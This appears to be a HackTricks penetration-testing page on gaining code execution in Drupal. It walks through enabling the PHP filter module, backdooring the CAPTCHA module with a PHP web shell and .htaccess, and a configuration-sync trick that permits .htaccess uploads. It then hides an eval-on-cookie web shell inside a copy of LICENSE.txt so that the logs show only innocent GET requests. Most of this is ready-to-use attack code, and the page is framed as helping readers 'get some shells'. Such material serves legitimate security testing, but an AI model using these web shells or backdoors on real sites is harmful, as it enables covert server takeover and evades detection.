12 KiB
Drupal RCE
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
With PHP Filter Module
{% hint style="warning" %}
In older versions of Drupal (before version 8), it was possible to log in as an admin and enable the PHP filter
module, which "Allows embedded PHP code/snippets to be evaluated." But from version 8 this module is not installed by default.
{% endhint %}
You need the plugin php to be installed (check it accessing to /modules/php and if it returns a 403 then, exists, if not found, then the plugin php isn't installed)
Go to Modules -> (Check) PHP Filter -> Save configuration
Then click on Add content -> Select Basic Page or Article -> Write php shellcode on the body -> Select PHP code in Text format -> Select Preview
Finally just access the newly created node:
curl http://drupal-site.local/node/3
Install PHP Filter Module
{% hint style="warning" %} In current versions i't no longer possible to install plugins by only having access to the web after the default installation. {% endhint %}
From version 8 onwards, the PHP Filter module is not installed by default. To leverage this functionality, we would have to install the module ourselves.
- Download the most recent version of the module from the Drupal website.
- Once downloaded go to
Administration
>Reports
>Available updates
. - Click on
Browse
,
select the file from the directory we downloaded it to, and then clickInstall
. - Once the module is installed, we can click on
Content
and create a new basic page, similar to how we did in the Drupal 7 example. Again, be sure to selectPHP code
from theText format
dropdown.
Backdoored Module
{% hint style="warning" %} In current versions it's no longer possible to install plugins by only having access to the web after the default installation. {% endhint %}
A backdoored module can be created by adding a shell to an existing module. Modules can be found on the drupal.org website. Let's pick a module such as CAPTCHA. Scroll down and copy the link for the tar.gz archive.
- Download the archive and extract its contents.
wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz
- Create a PHP web shell with the contents:
<?php
system($_GET["cmd"]);
?>
- Next, we need to create a
.htaccess
file to give ourselves access to the folder. This is necessary as Drupal denies direct access to the/modules
folder.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>
- The configuration above will apply rules for the / folder when we request a file in /modules. Copy both of these files to the captcha folder and create an archive.
mv shell.php .htaccess captcha
tar cvf captcha.tar.gz captcha/
- Assuming we have administrative access to the website, click on
Manage
and thenExtend
on the sidebar. Next, click on the+ Install new module
button, and we will be taken to the install page, such ashttp://drupal-site.local/admin/modules/install
Browse to the backdoored Captcha archive and clickInstall
. - Once the installation succeeds, browse to
/modules/captcha/shell.php
to execute commands.
Backdooring Drupal with Configuration synchronization
Post shared by Coiffeur0x90
Part 1 (activation of Media and Media Library)
In the Extend menu (/admin/modules), you can activate what appear to be plugins already installed. By default, plugins Media and Media Library don’t appear to be activated, so let’s activate them.
Before activation:
After activation:
Part 2 (leveraging feature Configuration synchronization)
We’ll leverage the Configuration synchronization feature to dump (export) and upload (import) Drupal configuration entries:
- /admin/config/development/configuration/single/export
- /admin/config/development/configuration/single/import
Patch system.file.yml
Let’s start by patching the first entry allow_insecure_uploads
from:
File: system.file.yml
...
allow_insecure_uploads: false
...
To:
File: system.file.yml
...
allow_insecure_uploads: true
...
Patch field.field.media.document.field_media_document.yml
Then, patch the second entry file_extensions
from:
File: field.field.media.document.field_media_document.yml
...
file_directory: '[date:custom:Y]-[date:custom:m]'
file_extensions: 'txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fodt fods fodp fodg key numbers pages'
...
To:
File: field.field.media.document.field_media_document.yml
...
file_directory: '[date:custom:Y]-[date:custom:m]'
file_extensions: 'htaccess txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fodt fods fodp fodg key numbers pages'
...
I don’t use it in this blogpost but it is noted that it is possible to define the entry
file_directory
in an arbitrary way and that it is vulnerable to a path traversal attack (so we can go back up within the Drupal filesystem tree).
Part 3 (leveraging feature Add Document)
The last step is the simplest, and is broken down into two sub-steps. The first is to upload a file in .htaccess format to leverage the Apache directives and allow .txt files to be interpreted by the PHP engine. The second is to upload a .txt file containing our payload.
File: .htaccess
<Files *>
SetHandler application/x-httpd-php
</Files>
# Vroum! Vroum!
# We reactivate PHP engines for all versions in order to be targetless.
<IfModule mod_php.c>
php_flag engine on
</IfModule>
<IfModule mod_php7.c>
php_flag engine on
</IfModule>
<IfModule mod_php5.c>
php_flag engine on
</IfModule>
Why is this trick cool?
Because once the Webshell (that we’ll call LICENSE.txt ) is dropped onto the Web server, we can transmit our commands via $_COOKIE
and in the Web server logs, this will show up as a legitimate GET request to a text file.
Why name our Webshell LICENSE.txt?
Simply because if we take the following file, for example core/LICENSE.txt (which is already present in the Drupal core), we have a file of 339 lines and 17.6 KB in size, which is perfect for adding a small snippet of PHP code in the middle (since the file is big enough).
File: Patched LICENSE.txt
...
this License, you may choose any version ever published by the Free Software
Foundation.
<?php
# We inject our payload into the cookies so that in the logs of the compromised
# server it shows up as having been requested via the GET method, in order to
# avoid raising suspicions.
if (isset($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"])) {
if (!empty($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"])) {
eval($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"]);
} else {
phpinfo();
}
}
?>
10. If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author
...
Part 3.1 (upload file .htaccess)
First, we leverage the Add Document (/media/add/document) feature to upload our file containing the Apache directives (.htaccess).
Part 3.2 (upload file LICENSE.txt)
Then, we leverage the Add Document (/media/add/document) feature again to upload a Webshell hidden within a license file.
Part 4 (interaction with the Webshell)
The last part consists of interacting with the Webshell.
As shown in the following screenshot, if the cookie expected by our Webshell is not defined, we get the subsequent result when consulting the file via a Web browser.
When the attacker sets the cookie, he can interact with the Webshell and execute any commands he wants.
And as you can see in the logs, it looks like only a txt file has been requested.
Thank you for taking the time to read this article, I hope it will help you get some shells.
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.